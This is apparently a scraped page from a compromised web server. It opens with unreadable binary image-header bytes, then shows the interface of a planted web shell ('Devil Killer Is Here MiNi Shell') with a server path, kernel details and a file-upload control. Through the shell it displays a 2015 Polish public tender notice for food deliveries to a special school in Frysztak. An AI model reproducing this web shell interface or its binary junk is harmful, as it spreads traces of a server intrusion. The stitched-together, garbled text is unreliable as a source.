JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150309/50914-N-2015.html

<p class="kh_header"><b>Frysztak: Sukcesywne dostawy artykułów spożywczych dla Specjalnego Ośrodka Szkolno - Wychowawczego we Frysztaku</b><br>
<b>Numer ogłoszenia: 50914 - 2015; data zamieszczenia: 09.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy , ul. Józefa Wybickiego 25, 38-130 Frysztak, woj. podkarpackie, tel. 17 2777206, faks 17 2777206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sosw-frysztak.strzyzowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych dla Specjalnego Ośrodka Szkolno - Wychowawczego we Frysztaku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Produkty zwierzęce, mięso, produkty mięsne, wędliny
Część II - Produkty mleczarskie
Część III - Różne produkty spożywcze
Część IV - Ryby przetworzone, konserwowane, filety rybne
Część V - Pieczywo, świeże wyroby piekarskie
Część VI - Wyroby ciastkarskie
Część VII - Warzywa i owoce mrożone
Część VIII - Jajka kurze
Część IX - Owoce i warzywa.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.50.00.00-3, 15.80.00.00-6, 15.20.00.00-0, 15.81.00.00-9, 15.81.21.00-4, 15.33.11.70-9, 03.14.25.00-3, 15.30.00.00-1, 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia(załącznik nr 3 do SIWZ).Ocena spełniania warunków udziału w postępowaniu nastąpi w formule spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia(załącznik nr 3 do SIWZ).Ocena spełniania warunków udziału w postępowaniu nastąpi w formule spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia(załącznik nr 3 do SIWZ).Ocena spełniania warunków udziału w postępowaniu nastąpi w formule spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia(załącznik nr 3 do SIWZ).Ocena spełniania warunków udziału w postępowaniu nastąpi w formule spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia(załącznik nr 3 do SIWZ).Ocena spełniania warunków udziału w postępowaniu nastąpi w formule spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnianiu warunków z art. 22 ust 1 ustawy Pzp.( załącznik nr 3 do SIWZ 2.Formularz cenowy (załącznik nr 1 do SIWZ). 3.Formularz ogólny oferty( załącznik nr 4 do SIWZ). 4.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w rozdziale IX siwz ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarciu umowy. Stosowne pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie należy dołączyć do oferty. 6.Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu rejestrowego, do oferty należy dołączyć także pełnomocnictwa w oryginale lub w postaci kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień zawiera załącznik nr 4 do siwz- wzór umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sosw-frysztak.strzyzowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno - Wychowawczy we Frysztaku, ul. J. Wybickiego 25, 38-130 Frysztak..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2015 godzina 11:00, miejsce: Specjalny Ośrodek Szkolno - Wychowawczy we Frysztaku, ul. J. Wybickiego 25, 38-130 Frysztak, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce, mięso, produkty mięsne, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szynka surowa	kg	40
Łopatka wieprzowa b/k	kg 700
Schab b/k	kg	40
Filet z kurczaka	kg	300
Ćwiartka z kurczaka	kg	150
Wątroba drobiowa	kg	100
Porcja rosołowa	kg	400
Wędzonka typu Limanowska	kg	50
Kiełbasa swojska	kg	30
Kiełbasa Szynkowa	kg	80
Szynka z indyka	kg	15
Pasztet drobiowy[ min.150 g]	szt.	50
Pasztet pieczony	kg	80
Polędwica  typu sopocka	kg	20
Kiełbasa parówkowa cienka	kg	150
Kiełbasa zwyczajna/popularna	kg	200
Kiełbasa krakowska parzona	kg	100
Polędwica drobiowa	kg	80
Kiełbasa toruńska	kg	20
Szynka gotowana	kg	20
Mortadela	kg	30
Lencz	kg	80
Salceson wp	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko spoż. pasteryzowane  min.2 % [1l] l	5000
2.	Śmietana min. 18 %  folia [500 ml]	szt	500
3.	Twaróg półtłusty	kg	400
4.	Kefir min. 1,5% kubek  [400 ml]	szt	200
5.	Maślanka 	l	100
6.	Serek homogenizowany wielosmakowy[min.150g]	szt	1200
7	Masło ekstra 200g 82% tłuszczu	szt	1400
8	Margaryna [min.250g .typu Palma]	szt	100
9	Margaryna [min.500g .typu Śniadaniowa]	szt	400
10	Jogurt owocowy[ min.125g]	szt.	700
11	Rolada serowa .typu[Ustrzycka]	kg	30
12	Ser pełnotłusty .typu[Edamski]	kg	40
13	Ser pełnotłusty .typu [Gouda]	kg	40
14	Ser pełnotłusty .typu[Salami]	kg	80
15	Ser topiony[min.100g]	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bazylia ( min.20 g)	szt	30
2	Brzoskwinie w syropie [min.820 g]	szt	20
3	Budyń śmietankowy bez cukru [min.64g]	szt	80
4	Budyń waniliowy bez cukru min.64g]	szt	80
5	Bulion grzybowy [min.60g np.typu Kucharek lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	80
6	Bułka tarta [ min,500g]	szt	250
7	Cukier kryształ (pakowany po 1 kg)	kg	900
8	Cukier puder [ min.500g]	szt	50
9	Cukier waniliowy[min.32g np.typu Delecta lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	150
10	Cynamon [min.20g]	szt	30
11	Czosnek granulowany[min.20g]	szt	150
12	Drożdże [min.100g]	szt	100
13	Dżem owocowy[min.260g]	szt	100
14	Dżem owocowy (min. 280g]	szt	100
15	Galaretka owocowa [min. 75g np.typu  Delecta lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	200
16	Groszek konserwowy  [min.400g]	szt	100
17	Herbata granulowana [min.100g]	szt	500
18	Przyprawa warzywna do potraw w proszku  typu kucharek lub produkt równoważny min.200g]	szt	200
19	Przyprawa warzywna do potraw w proszku  typu kucharek lub produkt równoważny min.75g]	szt	50
20	Kasza manna [ min500g]	szt	40
21	Kasza jęczmienna  min.[500g]	szt	80
22	Kasza jęczmienna ( min.1kg)	szt	20
23	Ketchup [1L  np. typu  Roleski, lub produkt równoważny o nie gorszych parametrach, przecier pomidorowy min.50 %]	szt	20
24	Ketchup min 450g typu Roleski,przecier pomidorowy min.50 %]	szt	200
			
25	Kisiel różne smaki bez cukru[ min. 58g]	szt	100
26	Kminek [min.20g]	szt	20
27	Koncentrat pomidorowy[ min.0,9L np. typu Roleski lub produkt równoważny o nie gorszych parametrach:30% ekstraktu,                 bez konserwantów, bez cukru, bez laktozy, bez tłuszcz                                 	szt	80
28	Koncentrat pomidorowy[200g np. typu Pudliszki lub produkt równoważny o nie gorszych parametrach:30% ekstraktu,  bez konserwantów, bez cukru, bez laktozy, bez tłuszcz   szt	150
29	Kwasek cytrynowy[min20g]	szt	60
30	Krem czekoladowy [min. 200g]	szt	400
31	Krem czekoladowy[ min. 380g]	szt	50
32	Kukurydza konserwowa [ min.400g]	szt	200
33	Kulki czekoladowe [min.250g]	szt	90
34	Płatki czekoladowe [1000g  np. typu Lubella lub produkt równoważny o nie gorszych parametrach jakościowych ]	szt	50
35	Płatki miodowe [ min.1000g  np. typu Lubella lub produkt równoważny o nie gorszych parametrach jakościowych ]	szt	40
36	Kapusta kiszona  [1 kg woreczek]	szt	150
37	Kakao [min.80g] typu Deco Moreno lub produkt równoważny o nie gorszych parametrach	szt	50
38	Kakao [min.150g] typu Deco Moreno lub produkt równoważny o nie gorszych parametrach	szt	50
39	Ziele angielskie[ min.10g]	szt	50
40	Liść laurowy [ min.10g]	szt	50
41	Majeranek [ min.10g]	szt	30
42	Majonez[ min.280g np. typu Roleski lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	80
43	Majonez[ min.835g np. typu Roleski lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	80
44	Makaron łazanka ,nitki, wstążki[ min.500g np. typu Eko-Mak lub o nie gorszych parametrach jakościowych]	szt	300
45	Makaron świderki, nitki, wstążki[1kg  np. typu Eko-Mak lub    o nie gorszych parametrach jakościowych	szt	100
46	Makaron zacierka, ryżowy[ min.250g np. typu Eko-Mak lub o nie gorszych parametrach jakościowych]	szt	50
47	Mąka pszenna Poznańska [typ 500][1kg            w  opakowaniu]	kg	600
48	Mąka ziemniaczana [min.500g]	szt	60
49	Mąka ziemniaczana [min.1000g]	szt	40
50	Miód prawdziwy [min.370g]	szt	80
51	Miód sztuczny[ min.370g]	szt	50
52	Olej uniwersalny [min.0,5 l]	szt	50
53	Olej uniwersalny [min.0,9 l]	szt	150
54	Olej uniwersalny [min.3l]	szt	50
55	Ogórki konserwowe min.[0,9 l]	szt	200
56	Ogórek kiszony [ min.900g słoik]	szt	100
57	Papryka słodka [ min.20g]	szt	50
58	Pieprz mielony [ min.20g]	szt	30
59	Pieprz mielony [ min.50g]	szt	50
60	Sos sałatkowy[ min.9g]	szt	30
61	Przyprawa do zup, sosów, potraw mięsnych i warzywnych [min.1L np. typu Winiary lub produkt równoważny o nie gorszych  parametrach jakościowych skład:woda, sól substancje wzmacniające smak, zapach, glutaminian sodu, ocet,  glukoza , aromat, ekstrakt drożdżowy]	szt	50
62	Przyprawa do zup, sosów, potraw mięsnych i warzywnych [min.200g np. typu Winiary lub produkt równoważny o nie gorszych  parametrach jakościowych skład:woda, sól substancje wzmacniające smak, zapach, glutaminian sodu, ocet,  glukoza , aromat, ekstrakt drożdżowy]	szt	50
63	Rodzynki [ min.100g]	szt	50
64	Rosołki w kostce[ min.120g  np. typu Kucharek lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	50
65	Rosołki grzybowe w kostce[ min.60g  np. typu Kucharek lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	30
66	Ryż[ pakowany po1kg]	kg	150
67	Sos Boloński w proszku [ min.43g np. typu  Amino lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	200
68	Sos Boloński  słoik [ min.520ml ]	szt	150
69	Sos grzybowy[ min.33g np.typu Amino lub produkt równoważny     o nie gorszych parametrach jakościowych]	szt	100
70	Sos pieczeniowy[min.38g np.typu  Amino lub produkt równoważny  o nie gorszych parametrach jakościowych]	szt	120
71	Sól jodowana	szt	150
72	Syrop owocowy[ min.430ml np. typu Paola lub produkt równoważny o nie gorszych parametrach jakościowych]	szt	300
73	Żurek w proszku [ min.46g np. typu Amino lub produkt równoważny  o nie gorszych parametrach jakościowych	szt	200
74	Zupa grzybowa i pieczarkowa[min.42g np. typu Amino lub produkt równoważny o nie gorszych parametrach jakościowych	szt	200
75	Żurek w płynie 0,5 l	szt	70
76	Przyprawa do kurczaka[20g]	szt	20
77	Przyprawa do piernika[20g]	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ryby przetworzone, konserwowane, filety rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Panga filet:kg250
2	Śledź w pomidorach (min.330 g):szt80
3	Paprykarz  rybny min. 330g:	szt50
4	Szprot w pomidorach ( min.330g):szt60
5	Śledź w oleju ( min.170g):szt60
6	Śledź w pomidorach(min.175g)szt40
7	Śledź po gdańsku ( min.170g):szt40
8	Filet z makreli w pomidorach (  min.170g):szt100
9	Tuńczyk  puszkowany w sosie własnym( min.170g):szt70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb graham krojony min.700g:szt 500
2	Chleb typu Baltonowski krojony700g:szt 1 500
3	Bułka pszenna duża min.100 g:szt 1000
4	Bułka pszenna mała min.50g:szt 15000
5	Bułka grahamka mała 50g szt:2000
6	Bułka hod- dog :szt 600
7	Solanka duża min.100g:szt	1000
8	Rogal mały bez nadzienia min.50 g:szt 1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyroby ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bułka maślana min.50g:szt 700
2	Drożdżówka z nadzieniem min.60g:szt	800
3	Drożdżówka z nadzieniem min.120g:szt 500
4	Rogal z nadzieniem  min. 100 g:szt 300
5	Pączek z marmoladą [min.70g]	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mieszanka kompotowa kg400
2	Mieszanka warzywna kg 100
3	Fasolka szparagowa mrożona kg 20
4	Leczo mrożone kg	30
5	Kalafior mrożony	kg	30
6	Zupa jarzynowa	kg	200
7	Paprykarz mrożony	kg	20
8	Truskawki mrożone	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja klasa M szt:	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Buraki czerwone:kg 300
2	Czosnek	szt: 60
3	Ziemniaki	kg: 2500
4	Fasola Jaś duży kg	:40
5	Fasola Jaś mały kg:60
6	Kapusta biała kg:150
7	Kapusta czerwona [główka] kg:80
8	Koper [pęczek]szt:	100
9	Marchew	kg: 400
11	Papryka zielona kg:10
12	Papryka żółta kg:	10
13	Pieczarki	kg: 120
